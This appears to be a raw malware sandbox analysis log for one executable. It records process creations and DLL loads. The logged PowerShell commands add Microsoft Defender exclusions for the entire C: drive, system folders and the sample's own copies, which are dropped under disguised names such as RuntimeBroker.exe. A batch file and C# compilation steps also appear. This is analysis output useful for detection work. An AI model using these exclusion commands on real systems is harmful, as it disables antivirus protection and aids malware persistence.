                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                          Source: unknownProcess created: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1ke8OVZbVo.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline"Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.cmdline"Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1ke8OVZbVo.bat" Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6986.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2072A4DD6B9C45BD955850FB555C1F90.TMP"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6B99.tmp" "c:\Windows\System32\CSC5918AA24663347D392372538DC1C654.TMP"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: version.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: version.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: version.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: mscoree.dll
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: version.dll
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: uxtheme.dll
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: windows.storage.dll
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: wldp.dll
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: profapi.dll
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: cryptsp.dll
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: rsaenh.dll
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: cryptbase.dll
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
